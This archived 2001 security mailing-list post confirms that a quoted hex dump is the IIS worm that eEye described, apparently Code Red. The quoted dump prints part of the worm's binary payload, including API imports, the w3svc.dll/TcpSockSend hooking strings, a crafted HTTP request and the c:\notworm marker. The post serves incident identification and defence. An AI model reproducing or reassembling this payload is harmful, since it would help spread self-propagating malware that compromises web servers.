That is indeed a worm, though you're missing the first part of the conversation. This is the worm that Marc from eeye has been posting about, I saw a post to incidents about it arrive shortly before this one, forwarded from Aleph1. Ryan On Tue, 17 Jul 2001, Scott Nursten wrote: > 0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo > 0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy > 0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT > 0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile > 0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste > 0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V > 0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i > 0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS > 0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32. > 0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne > 0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo > 0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc. > 0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT > 0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content- > 0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H > 0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com > 0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co > 0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35 > 0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo > 0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html>< ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 13:59:03 PDT